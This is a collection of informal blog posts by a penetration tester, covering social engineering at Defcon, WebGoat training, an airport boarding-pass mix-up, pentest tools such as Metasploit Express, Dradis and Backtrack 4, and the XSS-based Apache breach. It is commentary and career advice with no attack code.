This past week at Defcon the social engineering capture the flag competition was hotter and more controversial than ever. Contestants were given their target company two weeks in advance for research purposes. During the actual competition contestants called employees at the target companies to gain sensitive information. The overall result: A big fat fail for the human element.

As more companies begin to take security seriously budgeting for pen tests, equipment, etc. often the human element of security falls through the cracks. As shown at the Defcon competition, all the locks, both physical and network based, can’t stop an attacker if an employee ushers her through the door.

The Social Engineering Competition was put on by Social-Engineer.org which is an excellent place to learn more about social engineering. Don’t let a lack of employee awareness of social engineering attack vectors undermine your security program.

Web application hacking is big business. Even the traditionalist network penetration testers are crossing over to the new security rock and roll scene. The average individual doesn’t know what DNS does, and if I said, “I knocked over the internet by attacking BGP,” at a cocktail party, guests would probably suspect I just said something vulgar. On the other hand, “You are a hacker? Can you get credit card numbers off websites?” is a common reaction from even the computer unsavvy. My answer, “Yes, most websites suck.”

So how do you make your websites not suck? My colleague recently posted about OWASP’s ESAPI. Additionally, OWASP developed Webgoat, arguably the go-to training tool for web application hacking n00bs to cut their teeth. On top of giving hackers a chance to bring down websites in more than a dozen ways, several Webgoat lessons include a lab section. These labs include not only hacking the website, but also delving into the code to find the flaw that causes the vulnerability, fixing it, and testing the attack again. Getting down and dirty with the actual code is instructive for penetration testers and coders alike.

Webgoat labs should be mandatory for all website coders. Please start writing code that doesn’t suck so the web application hackers will stop getting so much attention and people will start paying attention to my mediocre attempts at hacking the infrastructure. Let’s call it the “Georgia for infosec prom queen” project shall we?

I’m fairly certain I unwittingly committed a serious crime. I went through airport security using someone else’s boarding pass, bearing a name that only resembled my own completely legitimate and self-representative government-issued ID in that our last names shared the same first letter. The TSA agent, you know the one, with the little hologram-checking flashlight, looked at my ID, my boarding pass, my ID again, me. I thought he seemed a tad skeptical, taking longer than necessary on a process he must step through about a million times a day. I will admit that passport photograph was taken when I was 16, and I can look a little like a fraud at 7 am after several nights of limited sleep. Rather than being annoyed at the slight holdup, though said lack of sleep had me about at the end of my rope with the usual ubiquitous airport annoyances, I realized this man was only doing his job to protect my safety. I can certainly hang around an extra 30 seconds so I don’t get blown to bits. Then he marked a bunch of esoteric jargon on the boarding pass I was not yet aware was not mine and sent me on through security. Who needs Bruce Schneier’s boarding pass switching trick when you can make it through security with just any old boarding pass that you find lying around the airport?

I thought there might be a snafu in the whole thing once I realized the flight I was waiting for was not my own and examined the boarding pass realizing Mr. W____/S____ was not in fact me. The problem I anticipated was the lack of said marks on my boarding pass. However, this was not the case, and I boarded my correct flight without incident.

How did I end up with someone else’s boarding pass? By what strange luck did I happen to have my own boarding pass waiting in the bottom of my backpack to save the day, no doubt saving me from a lot of awkward questions, possible detainment, and at the very least missing my flight by having to go back out through security to get the whole mess sorted out? As it happens, I took advantage of the online check-in and boarding pass printing option the evening before the flight. I decided to check my bag (mainly because I didn’t feel like lugging around my mammoth cissp book in not one but two airports). So I had to wait in line at the kiosks anyhow. I did not instruct the kiosk to print out another copy of my boarding pass; however before taking off towards security, I noticed a boarding pass in the kiosk. Not one to leave personal information lying around, I grabbed the pass, assuming the kiosk was living up to their generally unreliable reputation. Now that I had two copies of my boarding pass, why wouldn’t I opt to use the thick, newly printed one rather than the day old, wrinkly one cluttered with weather and restaurant information? I should have inspected the boarding pass for accuracy; I humbly admit this. I’m sure kiosks spit out the wrong boarding passes on occasion and even more often dazed and overwhelmed individuals leave their boarding passes behind. In my defense it was quite early, I suffer from severe flight anxiety that only massive doses of Xanax can assuage, and I did after all have another boarding pass on hand that I had carefully inspected for accuracy.

I did not attempt to board the other individual’s flight, but I did feel somewhat concerned for my safety. I won’t go into the specifics of ideas that came to mind for how black hats and terrorists might leverage this lack of constant vigilance on the part of TSA employees. I have enough trouble flying with fears of mechanical failure and turbulence. So please Washington Dulles International Airport and any other airports with this problem, step it up. Our safety is on the line.

Not to mention I had my lock picks in my bag by mistake and no one noticed.

I got a chance to see the Metasploit Express beta in action last week at NoVa Hackers. I was planning on writing about my impressions, but there is plenty out there from people who have spent a good deal more time in front of the beta than I have. Instead, I’m going to delve into pertinent questions a company should ask itself to see if Metasploit Express fits into the security program.

I am a fan of Core Impact, not only because they let me into their party at Blackhat Las Vegas last year. They make a good product. However, a common scenario I have seen in my experience as a security consultant is companies just purchasing flashy products without thinking about how these products will integrate into the security program. The Core Impact sales team comes in with their vulnerable machines and does the point-and-click to root. Then, the general consensus is “We’ve got to get that. It’s shiny!” The problem is when Core Impact shows up on the corporate network it doesn’t get any shells. Why? Because the customer is using Core Impact specifically for patch management which they already have under control. If a strong patch management system is already in place on the network, the default network scan from Core Impact will yield very little.

Metasploit Express builds off a very powerful open source tool with a wide variety of capabilities. It is quite possible that the product will be able to fill a gap in your security program. However, without researching your company’s needs, risks, and what Metasploit Express can do to meet them, you won’t get the most out of Metasploit Express. Sleek interfaces and support from Rapid7 cannot make up for a lack of understanding of your particular security needs.

On the whole, I’m glad to see Metasploit potentially reach a wider corporate audience with Metasploit Express. It seems in many cases Metasploit in its current form is considered a hack tool and passed over for products such as Core Impact that have a company backing and a hefty price tag. So long as I can still use community supported Metasploit for my everyday vulnerability research, I’m happy to see Metasploit get the piece of corporate pie it has long since earned.

Sometimes I travel for work. Sometimes I travel for pleasure. Sometimes when I travel for pleasure I bring my work along so as to maximize the number of days a year I can spend traveling for pleasure. How about you?

Recently I was on a plane, and it came to my attention that the computer screen directly in my line of sight had all the telltale signs of doing work. Was this passenger aware that I as well as several other passengers could see what had all the looks of stuff that should be shredded before heading to the dumpster? Translation: little ‘ole me who was bored with the onboard entertainment should not be able to see this information.

The thing that really got my attention and caused me to write this little note was when the passenger in question got up to go to the lavatory. On the surface this seemed like an ok thing to do. The fasten seatbelt sign was off. People are generally trustworthy enough that if some would-be cybercriminal swiped the passenger’s laptop, many witnesses would come forward and the laptop would be recovered. The problem was the passenger’s screen was still visible. Did the passenger know the individual sitting in the next seat even? Doesn’t the passenger’s company have a security policy complete with compliance training and certification that strictly prevents this sort of behavior?

In short, be vigilant. Just because you aren’t in the office, threats to company security are everywhere even at 30,000 feet. With smaller cameras with better zoom coming every day, it’s fair to say that anything on your screen may be readable to anyone with a view of your screen. Be aware of your surroundings and use caution when accessing work-related resources in public.

First off, I would like to commend Apache for their detailed, well written disclosures of security breaches. Some organizations take the esoteric route even within the organization, sometimes going so far as immediately reimaging machines that have potentially been compromised without performing any forensic analysis to see what attacks were successful and if any sensitive information was compromised. In the spirit of full disclosure, Apache not only goes through the steps of analyzing exactly what happened, but also shares this information with the public.

Many companies, as well as vulnerability researchers, believe that Cross Site Scripting (XSS) vulnerabilities are all benign; the worst that will possibly happen to your site is an alert window announcing “Georgia is l33t!” However part of the recent attack on Apache that resulted in root compromises of machines within Apache was a result of exploited XSS vulnerabilities. The incident report reads like something out of The Web Application Hacker’s Handbook. The attack used a bug reporting web forum that was vulnerable to XSS. When a user clicked on the link included in the bug report an XSS attack grabbed the user’s session cookie. Given that post was related to a potential bug in Apache software, it isn’t hard to imagine why an unsuspecting administrator might click the link.

This incident just goes to show that even an organization with a strong security posture can fall victim to the dangers of XSS attacks. Code review and penetration testing of web applications should be in place to assess the risk of malicious XSS attacks compromising your company’s assets. XSS vulnerabilities should be taken just as seriously as more hyped web application vulnerabilities.

Probably one of the first things you find out when you transition from “This is fun. Let’s learn some stuff about ethical hacking,” to breaking into doing it professionally is that it’s imperative to keep track of everything. Clients are going to want a little more information than “Oh look I broke in! I’m so cool!” They are going to want an in-depth report (a whole new skill to learn). Thus keeping records of what you did as you do it becomes a vital part of the job. Additionally, whether working on a pentest, playing red at a cyber defense competition, or pretty much any other large project, chances are you will find yourself working on a team. In school after working on team based projects, “Communication among team members is vital to the success of the project,” was always at the top of my list of lessons learned. That’s where the Dradis Framework comes in to play.

The Dradis Framework is an open source tool aimed at penetration testers developed in ruby. As stated in a previous post Dradis is all set up and ready to go on Backtrack 4, though the Dradis team recently released a new version with some exciting new features, so it might be time for persistent changes on your pentest box if you haven’t already and to upgrade. If you aren’t using Backtrack 4, do not despair. Dradis runs on several versions of Linux, Windows, and Mac. Additionally the Dradis team provides excellent support for getting the framework setup. With a few prerequisites, you’ll be ready to get started conducting well organized pentests.

Dradis allows you to easily import the results from common tools such as nmap and Nessus. The newest version has added plugins for importing results for the Burp scanner and Nikto. Another useful feature is the ability to add notes to any node with comments for the rest of your team like, “I tried Metasploit module X against this, but no cigar.” This helps to cut down on overlap among team members if everyone notes what they’ve done, and what they think looks interesting but hasn’t gotten around to fully exploring.

I have found Dradis to be especially useful playing red team during cyber defense exercises. It’s a fast paced, high stressed scenario, often with multiple target networks that you need to hit as equally as possible. Also, you are often the team is made up of people you aren’t used to working with, so the rapport built through working together every day isn’t there. A centralized place where everyone can see what has been done, and what still needs to be done again reduces overlap and wasted time. So if organizing your pentests is getting you down, Dradis might just be the solution you’ve been looking for.

So you think penetration testing might be a fun and valuable skill to pick up. You read some books on the subject and spend a good few evenings poring over the man pages of some common tools, what now? Chances are you set up a couple of unpatched or otherwise vulnerable machines and test out your skills. Next thing you know Metasploit has a system shell. Are you a pentester now? Chances are the experience left you somewhat unsatisfied; you did after all know the vulnerabilities ahead of time. To be a real pentester, you will have to start from scratch with little or no knowledge of the network at hand. So what now?

No doubt there are plenty of vulnerable boxes out there on the internet just waiting to be pillaged, but jail time doesn’t exactly seem like the best way to start a career. My colleague Tim recently posted about vulnerable WebApp scenarios that are definitely worth checking out. I’d like to point you in the direction of some additional resources at heorot.net. The de-ice penetration testing livecds are ideal for taking that next step in your penetration testing training. Multiple levels are provided as you progress and hints are provided if you get stuck. Here again, you know these hosts are vulnerable, but you certainly don’t know how. To successfully complete them, you will need to develop the critical thinking skills as well as mastering the tools of the trade. These livecds also come prepackaged with Thomas Wilhelm’s book Professional Penetration Testing available from Syngress which I would also recommend picking up to aid your study of the exciting world of pentesting.

It’s the news the penetration testers have all been long awaiting; Backtrack 4 final is here and now. Though many people, myself included, have been using various pre-release, beta release, and pre-final release flavors for almost a year now ever since first standing in line to hand over my usb stick to a group of elite hackers at Shmoocon 5, now there is no excuse. The final release is just in time for Hack or Halo at Shmoocon 6, saving me the trouble of making sure to update every tool I might possibly need before the big event.

So why does Backtrack rock in general? It’s basically most of the tools you will need for your pentest all rolled into one and set up nicely. I say most because it doesn’t have your commercial tools such as Nessus built in for obvious reasons, though it is possible to integrate your licensed Nessus into your Backtrack install. Ever been setting up Dradis for your first big pentesting gig at a new company on a recently imaged box? You’ve got your ruby prerequisites (rubydev, opensslruby, etc.), various gardening tools, SQLite, diamonds, garnets, and opals. At some point in the process of getting it all integrated, even your technically savvy individual may find himself ruing the day he decided it was a good idea to wait until the night before to build the pentest box. In Backtrack it goes like this:
root@bt4: cd /pentest/misc/dradis/server
root@bt4: ruby ./script/server
Done.

So why upgrade to Backtrack 4? First off, there’s the obvious perk of having the newest versions of all your favorite tools and some you’ve had on your list to check out for a while now. It also includes some new tools that have been developed in the interim since Backtrack 3 came out way back in summer of 2008, saving you the trouble of those pesky installs and svn checkouts. A great new tool that’s making its Backtrack debut on the final release of Backtrack 4 is re1ik’s social engineering toolkit (SET). Additionally, Backtrack 4 is Ubuntu based rather than Slackware based. While Backtrack 3 was great, your Ubuntu-based system has its perks as far as driver integration goes. As more and more people move from just the Live-CD Backtrack approach to using Backtrack as the base operating system on their pentesting boxes, this can only be a step in the right direction. Speaking of installation, Backtrack 4 final has an installation script that looks a lot like the GUI-based point-and-click installation wizards seen in system such as Ubuntu, resulting in a more hands-off approach than persistent changes in Backtrack 3.

The only drawback with Backtrack 4 as is that I can think of would be trying to write up your reports in Backtrack. Let’s not get into any holy war between writing in vi or nano, and just suffice to say it’s not easy. Backtrack 4 does come with Emacs, and some included tools such as Maltego make some pretty graphs. Plus, you can install OpenOffice on Backtrack, so it’s not that big of a drawback after all.
All in all, Backtrack 4 is the bomb, and if you haven’t jumped on the bandwagon, my advice is to get to it.

Georgia

It’s all over the news; Google finally has an Android to call its own. The media is throwing around terms such as iPhone killer, but that doesn’t seem altogether likely to me. Perhaps it will level out to a PC vs. Mac sort of scenario. This actually sounds plausible as in my research I came across news of a project working on porting Mac OSX 7 to the iPhone, and the great big thing with Android back when I got mine was running Debian on the G1.

Read the rest of this entry »